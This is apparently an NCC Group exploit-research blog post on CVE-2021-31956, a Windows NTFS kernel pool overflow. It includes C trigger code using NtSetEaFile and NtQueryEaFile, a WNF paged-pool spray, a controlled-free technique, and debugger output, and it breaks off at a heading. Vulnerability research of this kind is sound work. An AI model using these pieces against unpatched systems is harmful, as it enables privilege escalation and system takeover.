NCC Group Research

CVE-2021-31956 Exploiting the Windows Kernel (NTFS with WNF) – Part 1

By: Alex Plaskett

Introduction

Recently I decided to take a look at CVE-2021-31956, a local privilege escalation within Windows due to a kernel memory corruption bug which was patched within the June 2021 Patch Tuesday.

Microsoft describe the vulnerability within their advisory document, which notes that many versions of Windows are affected and that the issue has been exploited in the wild in targeted attacks. The exploit was found in the wild by https://twitter.com/oct0xor of Kaspersky.

Kaspersky produced a nice summary of the vulnerability and describe briefly how the bug was exploited in the wild.

As I did not have access to the exploit (unlike Kaspersky?), I attempted to exploit this vulnerability on Windows 10 20H2 to determine the ease of exploitation and to understand the challenges attackers face when writing a modern kernel pool exploit for Windows 10 20H2 and onwards.

One thing that stood out to me was the mention of the Windows Notification Facility (WNF) being used by the in-the-wild attackers to enable novel exploit primitives. This led to further investigation into how this could be used to aid exploitation in general. The findings I present below are obviously speculation based on likely uses of WNF by an attacker. I look forward to seeing the Kaspersky write-up to determine if my assumptions on how this feature could be leveraged are correct!

This blog post is the first in the series and will describe the vulnerability, the initial constraints from an exploit development perspective and finally how WNF can be abused to obtain a number of exploit primitives. The blogs will also cover exploit mitigation challenges encountered along the way, which make writing modern pool exploits more difficult on the most recent versions of Windows.

Future blog posts will describe improvements which can be made to an exploit to enhance reliability, stability and clean-up afterwards.

Vulnerability Summary

As there was already a nice summary produced by Kaspersky it was trivial to locate the vulnerable code inside the ntfs.sys driver’s NtfsQueryEaUserEaList function:
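A minimal simulation of the loop's size accounting, based on the description that follows (illustrative only, not the actual decompiled source; it uses the example values from the walkthrough further below):

#include <stdint.h>
#include <stdio.h>

int main(void)
{
    // ea_block_size = EaNameLength + EaValueLength + 9 for each queried
    // attribute; these are the example values from the walkthrough below.
    uint32_t ea_sizes[] = { 18, 61 };
    uint32_t out_buf_length = 18;   // attacker-chosen output buffer Length
    uint32_t padding = 0;

    for (int i = 0; i < 2; i++) {
        uint32_t ea_block_size = ea_sizes[i];

        // Vulnerable check: when padding > out_buf_length the unsigned
        // subtraction wraps around and the check passes for any size.
        if (ea_block_size > out_buf_length - padding)
            break;

        printf("copying %u bytes, %u bytes of buffer left\n",
               ea_block_size, out_buf_length);

        // The copy of ea_block_size bytes happens here in the driver.
        out_buf_length -= ea_block_size + padding;

        // Each Ea block is padded to a 32-bit boundary.
        padding = ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;
    }
    return 0;
}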

The backing structure in this case is _FILE_FULL_EA_INFORMATION.

Basically the code above loops through each NTFS extended attribute (Ea) for a file and copies from the Ea Block into the output buffer based on the size of ea_block->EaValueLength + ea_block->EaNameLength + 9.

There is a check to ensure that the ea_block_size is less than or equal to out_buf_length - padding.

The out_buf_length is then decremented by the size of the ea_block_size and its padding.

The padding is calculated by ((ea_block_size + 3) & 0xFFFFFFFC) - ea_block_size;

This is because each Ea Block should be padded to be 32-bit aligned.

Putting some example numbers into this, let's assume the file has two extended attributes.

At the first iteration of the loop we could have the following values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18
padding = 0

So assuming that 18 <= out_buf_length - 0, data would be copied into the buffer. We will use an out_buf_length of 30 for this example.

out_buf_length = 30 - (18 + 0)
out_buf_length = 12 // we would have 12 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

We could then have a second extended attribute in the file with the same values:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 = 18

At this point padding is 2, so the calculation is:

18 <= 12 - 2 // is False.

Therefore, the second memory copy would correctly not occur due to the buffer being too small.

However, consider the scenario where out_buf_length is 18 and we have the following setup.

First extended attribute:

EaNameLength = 5
EaValueLength = 4

Second extended attribute:

EaNameLength = 5
EaValueLength = 47

First iteration of the loop:

EaNameLength = 5
EaValueLength = 4

ea_block_size = 9 + 5 + 4 // 18
padding = 0

The resulting check is:

18 <= 18 - 0 // is True and a copy of 18 occurs.
out_buf_length = 18 - (18 + 0)
out_buf_length = 0 // We would have 0 bytes left of the output buffer.

padding = ((18+3) & 0xFFFFFFFC) - 18
padding = 2

Our second extended attribute has the following values:

EaNameLength = 5
EaValueLength = 47

ea_block_size = 5 + 47 + 9
ea_block_size = 61

The resulting check will be:

ea_block_size <= out_buf_length - padding

61 <= 0 - 2

At this point the check has been underflowed: out_buf_length is unsigned, so 0 - 2 wraps around to a huge value, the check passes, and 61 bytes will be copied off the end of the buffer, corrupting the adjacent memory.

Looking at the caller of this function NtfsCommonQueryEa, we can see the output buffer is allocated on the paged pool based on the size requested:

By looking at the callers of NtfsCommonQueryEa we can see that the NtQueryEaFile system call triggers this code path and reaches the vulnerable code.

The documentation for the Zw version of this syscall function is here.

We can see that the output buffer Buffer is passed in from userspace, together with the Length of this buffer. This means we end up with a controlled-size allocation in kernel space based on the size of the buffer. However, to trigger this vulnerability, we need to trigger an underflow as described above.

In order to trigger the underflow, we need to set our output buffer size to be the length of the first Ea Block.

Provided the first Ea Block requires padding, the second Ea Block will then be written out of bounds of the buffer when it is queried.

The interesting aspects of this vulnerability from an attacker's perspective are:

1) The attacker can control the data which is used within the overflow and the size of the overflow. Extended attribute values do not constrain the values which they can contain.
2) The overflow is linear and will corrupt any adjacent pool chunks.
3) The attacker has control over the size of the pool chunk allocated.

However, the question is whether this can be exploited reliably in the presence of modern kernel pool mitigations, and whether this is a "good" memory corruption:

What makes a good memory corruption.

Triggering the corruption

So how do we construct a file containing NTFS extended attributes which will lead to the vulnerability being triggered when NtQueryEaFile is called?

The function NtSetEaFile has the Zw version documented here.

The Buffer parameter here is “a pointer to a caller-supplied, FILE_FULL_EA_INFORMATION-structured input buffer that contains the extended attribute values to be set”.

Therefore, using the values above, the first extended attribute occupies the space within the buffer between offsets 0 and 18.

There is then a padding length of 2, with the second extended attribute starting at offset 20.

typedef struct _FILE_FULL_EA_INFORMATION {
  ULONG  NextEntryOffset;
  UCHAR  Flags;
  UCHAR  EaNameLength;
  USHORT EaValueLength;
  CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

The key thing here is that NextEntryOffset of the first EA block is set to the offset of the overflowing EA including the padding position (20). Then for the overflowing EA block the NextEntryOffset is set to 0 to end the chain of extended attributes being set.

This means constructing two extended attributes, where the first extended attribute block has the size we want our vulnerable buffer to be allocated with (minus the pool header). The second extended attribute block holds the overflow data.

If we set our first extended attribute block to be exactly the size of the Length parameter passed to NtQueryEaFile then, provided there is padding, the check will be underflowed and the second extended attribute block will allow a copy of an attacker-controlled size.

So in summary, once the extended attributes have been written to the file using NtSetEaFile, it is then necessary to trigger the vulnerable code path acting on them by calling NtQueryEaFile with an output buffer size exactly the same as the size of our first extended attribute.
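The following user-mode sketch puts these steps together, assuming h is a handle to a file on an NTFS volume and that the Nt* stubs are resolved from ntdll.dll (the prototypes mirror the documented Zw* versions; the names, buffer sizes and structure definitions here are illustrative, not the author's PoC):

#include <windows.h>
#include <winternl.h>
#include <string.h>

typedef struct _FILE_FULL_EA_INFORMATION {
    ULONG  NextEntryOffset;
    UCHAR  Flags;
    UCHAR  EaNameLength;
    USHORT EaValueLength;
    CHAR   EaName[1];
} FILE_FULL_EA_INFORMATION, *PFILE_FULL_EA_INFORMATION;

typedef struct _FILE_GET_EA_INFORMATION {
    ULONG NextEntryOffset;
    UCHAR EaNameLength;
    CHAR  EaName[1];
} FILE_GET_EA_INFORMATION, *PFILE_GET_EA_INFORMATION;

NTSTATUS NTAPI NtSetEaFile(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG);
NTSTATUS NTAPI NtQueryEaFile(HANDLE, PIO_STATUS_BLOCK, PVOID, ULONG,
                             BOOLEAN, PVOID, ULONG, PULONG, BOOLEAN);

void TriggerOverflow(HANDLE h)
{
    IO_STATUS_BLOCK iosb;
    UCHAR ea[0x100] = {0}, list[0x20] = {0}, out[18];

    // First Ea block: 9 + 5 + 4 = 18 bytes, padded to 20 for the next.
    PFILE_FULL_EA_INFORMATION ea1 = (PFILE_FULL_EA_INFORMATION)ea;
    ea1->NextEntryOffset = 20;
    ea1->EaNameLength = 5;  ea1->EaValueLength = 4;
    memcpy(ea1->EaName, "AAAAA", 6);          // name plus NUL terminator
    memset(ea1->EaName + 6, 'B', 4);          // 4 value bytes

    // Second Ea block: 9 + 5 + 47 = 61 bytes of overflow data.
    PFILE_FULL_EA_INFORMATION ea2 = (PFILE_FULL_EA_INFORMATION)(ea + 20);
    ea2->NextEntryOffset = 0;                 // terminates the chain
    ea2->EaNameLength = 5;  ea2->EaValueLength = 47;
    memcpy(ea2->EaName, "CCCCC", 6);
    memset(ea2->EaName + 6, 'D', 47);         // attacker-controlled OOB data

    NtSetEaFile(h, &iosb, ea, 20 + 61);

    // An EaList naming both attributes routes the query through the
    // vulnerable NtfsQueryEaUserEaList path.
    PFILE_GET_EA_INFORMATION g1 = (PFILE_GET_EA_INFORMATION)list;
    g1->NextEntryOffset = 12;                 // 5 + 5 + 1, padded to 12
    g1->EaNameLength = 5;  memcpy(g1->EaName, "AAAAA", 6);
    PFILE_GET_EA_INFORMATION g2 = (PFILE_GET_EA_INFORMATION)(list + 12);
    g2->NextEntryOffset = 0;
    g2->EaNameLength = 5;  memcpy(g2->EaName, "CCCCC", 6);

    // Length == size of the first Ea block (18): the check underflows on
    // the second block and 61 bytes are copied past the 18-byte buffer.
    NtQueryEaFile(h, &iosb, out, sizeof(out), FALSE, list, 12 + 11, NULL, TRUE);
}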

Understanding the kernel pool layout on Windows 10

The next thing we need to understand is how kernel pool memory works. There is plenty of older material on kernel pool exploitation on older versions of Windows; however, not very much on recent versions of Windows 10 (19H1 and up). There have been significant changes, bringing userland Segment Heap concepts to the Windows kernel pool. I highly recommend reading Scoop the Windows 10 Pool! by Corentin Bayet and Paul Fariello from Synacktiv for a brilliant paper on this, which also proposes some initial techniques. Without this paper having been published already, exploitation of this issue would have been significantly harder.

Firstly, the important thing is to determine where in memory the vulnerable pool chunk is allocated and what the surrounding memory looks like, i.e. which of the four "backends" the chunk lives on:

  • Low Fragmentation Heap (LFH)
  • Variable Size Heap (VS)
  • Segment Allocation
  • Large Alloc

I started off using the NtQueryEaFile parameter Length value of 0x12 from above, ending up with a vulnerable chunk of size 0x30 allocated on the LFH as follows:

Pool page ffff9a069986f3b0 region is Paged pool
 ffff9a069986f010 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f040 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f070 size:   30 previous size:    0  (Free)       ....
 ffff9a069986f0a0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f0d0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f100 size:   30 previous size:    0  (Allocated)  Luaf
 ffff9a069986f130 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f160 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f190 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f1c0 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f1f0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f220 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f250 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f280 size:   30 previous size:    0  (Free)       SeGa
 ffff9a069986f2b0 size:   30 previous size:    0  (Free)       Ntf0
 ffff9a069986f2e0 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f310 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f340 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f370 size:   30 previous size:    0  (Free)       APpt
*ffff9a069986f3a0 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff9a069986f3d0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffff9a069986f400 size:   30 previous size:    0  (Free)       SeSd
 ffff9a069986f430 size:   30 previous size:    0  (Free)       CMNb
 ffff9a069986f460 size:   30 previous size:    0  (Free)       SeUs
 ffff9a069986f490 size:   30 previous size:    0  (Free)       SeGa

This is due to the size of the allocation being below 0x200, so it is serviced by the LFH.

We can step through the corruption of the adjacent chunk occurring by setting a conditional breakpoint on the following location:

bp Ntfs!NtfsQueryEaUserEaList "j @r12 != 0x180 & @r12 != 0x10c & @r12 != 0x40 '';'gc'"

and then breakpointing on the memcpy location.

This example ignores some common sizes which are often hit on 20H2, as this code path is used by the system often under normal operation.

It should be mentioned that I initially missed the fact that the attacker has good control over the size of the pool chunk, and therefore went down the path of constraining myself to an expected chunk size of 0x30. This constraint was not actually real; however, it demonstrates that even tighter attacker constraints can often be worked around, and that you should always try to understand the constraints of your bug fully before jumping into exploitation 🙂

By analyzing the vulnerable NtFE allocation, we can see we have the following memory layout:

!pool @r9
*ffff8001668c4d80 size:   30 previous size:    0  (Allocated) *NtFE
    Pooltag NtFE : Ea.c, Binary : ntfs.sys
 ffff8001668c4db0 size:   30 previous size:    0  (Free)       C...

1: kd> dt !_POOL_HEADER ffff8001668c4d80
nt!_POOL_HEADER
   +0x000 PreviousSize     : 0y00000000 (0)
   +0x000 PoolIndex        : 0y00000000 (0)
   +0x002 BlockSize        : 0y00000011 (0x3)
   +0x002 PoolType         : 0y00000011 (0x3)
   +0x000 Ulong1           : 0x3030000
   +0x004 PoolTag          : 0x4546744e
   +0x008 ProcessBilled    : 0x0057005c`007d0062 _EPROCESS
   +0x008 AllocatorBackTraceIndex : 0x62
   +0x00a PoolTagHash      : 0x7d

Followed by 0x12 bytes of the data itself.

This means that the chunk size calculation is 0x12 + 0x10 = 0x22, which is then rounded up to the 0x30 segment chunk size.

We can however also adjust both the size of the allocation and the amount of data we will overflow.

As an alternative example, using the following values overflows from a chunk of 0x70 into the adjacent pool chunk (debug output is taken from testing code):

NtCreateFile is located at 0x773c2f20 in ntdll.dll
RtlDosPathNameToNtPathNameN is located at 0x773a1bc0 in ntdll.dll
NtSetEaFile is located at 0x773c42e0 in ntdll.dll
NtQueryEaFile is located at 0x773c3e20 in ntdll.dll
WriteEaOverflow EaBuffer1->NextEntryOffset is 96
WriteEaOverflow EaLength1 is 94
WriteEaOverflow EaLength2 is 59
WriteEaOverflow Padding is 2
WriteEaOverflow ea_total is 155
NtSetEaFileN sucess
output_buf_size is 94
GetEa2 pad is 1
GetEa2 Ea1->NextEntryOffset is 12
GetEa2 EaListLength is 31
GetEa2 out_buf_length is 94

This ends up being allocated within a 0x70 byte chunk:

ffffa48bc76c2600 size:   70 previous size:    0  (Allocated)  NtFE

As you can see it is therefore possible to influence the size of the vulnerable chunk.

At this point, we need to determine if it is possible to allocate adjacent chunks of a useful size class which can be overflowed into, to gain exploit primitives, as well as how to manipulate the paged pool to control the layout of these allocations (feng shui).

Much less has been written on Windows Paged Pool manipulation than Non-Paged pool and to our knowledge nothing at all has been publicly written about using WNF structures for exploitation primitives so far.

WNF Introduction

The Windows Notification Facility is a notification system within Windows which implements a publisher/subscriber model for delivering notifications.

Great previous research has been performed by Alex Ionescu and Gabrielle Viala documenting how this feature works and is designed.

I don’t want to duplicate the background here, so I recommend reading their research first to get up to speed.

Having a good grounding in the above research will allow a better understanding of how WNF-related structures are used by Windows.

Controlled Paged Pool Allocation

One of the first important things for kernel pool exploitation is being able to control the state of the kernel pool to be able to obtain a memory layout desired by the attacker.

There has been plenty of previous research into the non-paged pool and the session pool; however, less from a paged pool perspective. As this overflow is occurring within the paged pool, we need to find exploit primitives allocated within this pool.

Now after some reversing of WNF, it was determined that the majority of allocations used within this feature use memory from the paged pool.

I started off by looking through the primary structures associated with this feature and what could be controlled from userland.

One of the first things which stood out to me was that the actual data used for notifications is stored after the following structure:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

Which is pointed at by the WNF_NAME_INSTANCE structure’s StateData pointer:

nt!_WNF_NAME_INSTANCE
   +0x000 Header           : _WNF_NODE_HEADER
   +0x008 RunRef           : _EX_RUNDOWN_REF
   +0x010 TreeLinks        : _RTL_BALANCED_NODE
   +0x028 StateName        : _WNF_STATE_NAME_STRUCT
   +0x030 ScopeInstance    : Ptr64 _WNF_SCOPE_INSTANCE
   +0x038 StateNameInfo    : _WNF_STATE_NAME_REGISTRATION
   +0x050 StateDataLock    : _WNF_LOCK
   +0x058 StateData        : Ptr64 _WNF_STATE_DATA
   +0x060 CurrentChangeStamp : Uint4B
   +0x068 PermanentDataStore : Ptr64 Void
   +0x070 StateSubscriptionListLock : _WNF_LOCK
   +0x078 StateSubscriptionListHead : _LIST_ENTRY
   +0x088 TemporaryNameListEntry : _LIST_ENTRY
   +0x098 CreatorProcess   : Ptr64 _EPROCESS
   +0x0a0 DataSubscribersCount : Int4B
   +0x0a4 CurrentDeliveryCount : Int4B

Looking at the function NtUpdateWnfStateData we can see that this can be used for controlled size allocations within the paged pool, and can be used to store arbitrary data.
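Its prototype, as reconstructed in public research (the call is not in the official headers, so treat the parameter names as assumptions), is along these lines:

NTSTATUS NTAPI NtUpdateWnfStateData(
    const WNF_STATE_NAME *StateName,       // which name instance to update
    const VOID           *Buffer,          // arbitrary caller-supplied data
    ULONG                 Length,          // drives the pool allocation size
    const WNF_TYPE_ID    *TypeId,
    const VOID           *ExplicitScope,
    WNF_CHANGE_STAMP      MatchingChangeStamp,
    ULONG                 CheckStamp);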

The following allocation occurs within ExpWnfWriteStateData, which is called from NtUpdateWnfStateData:

v19 = ExAllocatePoolWithQuotaTag((POOL_TYPE)9, (unsigned int)(v6 + 16), 0x20666E57u);

Looking at the prototype of the function:

We can see that the Length argument corresponds to our v6 value, with 16 (0x10) bytes added for the header which is prepended.

Therefore, we have a 0x10-byte _POOL_HEADER as follows:

1: kd> dt _POOL_HEADER
nt!_POOL_HEADER
   +0x000 PreviousSize     : Pos 0, 8 Bits
   +0x000 PoolIndex        : Pos 8, 8 Bits
   +0x002 BlockSize        : Pos 0, 8 Bits
   +0x002 PoolType         : Pos 8, 8 Bits
   +0x000 Ulong1           : Uint4B
   +0x004 PoolTag          : Uint4B
   +0x008 ProcessBilled    : Ptr64 _EPROCESS
   +0x008 AllocatorBackTraceIndex : Uint2B
   +0x00a PoolTagHash      : Uint2B

followed by the _WNF_STATE_DATA of size 0x10:

nt!_WNF_STATE_DATA
   +0x000 Header           : _WNF_NODE_HEADER
   +0x004 AllocatedSize    : Uint4B
   +0x008 DataSize         : Uint4B
   +0x00c ChangeStamp      : Uint4B

With the arbitrary-sized data following the structure.

To track the allocations we make using this function we can use the following conditional breakpoint:

bp nt!ExpWnfWriteStateData "j @r8 == 0x100 '';'gc'"

We can then construct an allocation method which creates a new state name and performs our allocation:

NtCreateWnfStateName(&state, WnfTemporaryStateName, WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
NtUpdateWnfStateData(&state, buf, alloc_size, 0, 0, 0, 0);
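Wrapped in a loop this becomes a paged pool spray; a rough sketch, where SPRAY_COUNT, the 0x10-byte payload and the psd security descriptor are illustrative choices, and the type and enum definitions are the usual public reconstructions rather than official headers:

// Minimal type reconstructions (not from official headers).
typedef struct _WNF_STATE_NAME { ULONG Data[2]; } WNF_STATE_NAME;
#define WnfTemporaryStateName 3    // WNF_STATE_NAME_LIFETIME
#define WnfDataScopeMachine   4    // WNF_DATA_SCOPE

#define SPRAY_COUNT 10000

WNF_STATE_NAME states[SPRAY_COUNT];
UCHAR payload[0x10];
memset(payload, 'A', sizeof(payload));

for (int i = 0; i < SPRAY_COUNT; i++) {
    // Each iteration allocates a _WNF_NAME_INSTANCE plus, on update, a
    // _WNF_STATE_DATA chunk of sizeof(payload) + 0x10 + 0x10 (pool
    // header) -- the 0x30 chunks seen in the !pool output below.
    NtCreateWnfStateName(&states[i], WnfTemporaryStateName,
                         WnfDataScopeMachine, FALSE, 0, 0x1000, psd);
    NtUpdateWnfStateData(&states[i], payload, sizeof(payload), 0, 0, 0, 0);
}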

Using this we can spray controlled sizes within the paged pool and fill it with controlled objects:

1: kd> !pool ffffbe0f623d7190
Pool page ffffbe0f623d7190 region is Paged pool
 ffffbe0f623d7020 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7050 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7080 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d70e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7110 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7140 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
*ffffbe0f623d7170 size:   30 previous size:    0  (Allocated) *Wnf  Process: ffff87056ccc0080
        Pooltag Wnf  : Windows Notification Facility, Binary : nt!wnf
 ffffbe0f623d71a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d71d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7200 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7230 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7260 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7290 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d72f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7320 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7350 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7380 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d73e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7410 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7440 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7470 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d74d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7500 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7530 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7560 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7590 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d75f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7620 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7650 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7680 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d76e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7710 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7740 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7770 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77a0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d77d0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7800 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7830 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7860 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7890 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78c0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d78f0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7920 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7950 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7980 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79b0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d79e0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7a70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7aa0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ad0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7b90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bc0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7bf0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7c80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7cb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ce0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d10 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d40 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7d70 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7da0 size:   30 previous size:    0  (Allocated)  Ntf0
 ffffbe0f623d7dd0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e00 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e30 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e60 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7e90 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ec0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7ef0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f20 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f50 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7f80 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080
 ffffbe0f623d7fb0 size:   30 previous size:    0  (Allocated)  Wnf  Process: ffff87056ccc0080

This is useful for filling the pool with chunks of both a controlled size and controlled data, so we continue our investigation of the WNF feature.

Controlled Free

The next thing which would be useful from an exploit perspective would be the ability to free WNF chunks on demand within the paged pool.

There’s also an API call which does this: NtDeleteWnfStateData, which calls into ExpWnfDeleteStateData, which in turn ends up freeing our allocation.
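Its prototype follows the same reconstructed pattern, and combined with the spray above it can punch holes of a chosen size into the pool (a sketch, reusing the states[] array from earlier):

NTSTATUS NTAPI NtDeleteWnfStateData(const WNF_STATE_NAME *StateName,
                                    const VOID *ExplicitScope);

// Free every other sprayed chunk, leaving regularly spaced holes for a
// subsequent allocation (such as the vulnerable NTFS buffer) to land in.
for (int i = 0; i < SPRAY_COUNT; i += 2)
    NtDeleteWnfStateData(&states[i], NULL);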

Whilst researching this area, I was able to reuse the freed chunk straight away with a new allocation. More investigation is needed to determine if the LFH makes use of delayed free lists; in my case, from empirical testing, I did not seem to be hitting these after a large spray of Wnf chunks.

Relative Memory Read

